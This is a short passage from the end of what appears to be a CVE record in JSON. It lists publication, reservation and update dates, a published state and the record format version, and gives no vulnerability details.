"datePublished": "2007-06-21T22:00:00.000Z",
"dateReserved": "2007-06-21T00:00:00.000Z",
"dateUpdated": "2024-08-07T14:14:12.912Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}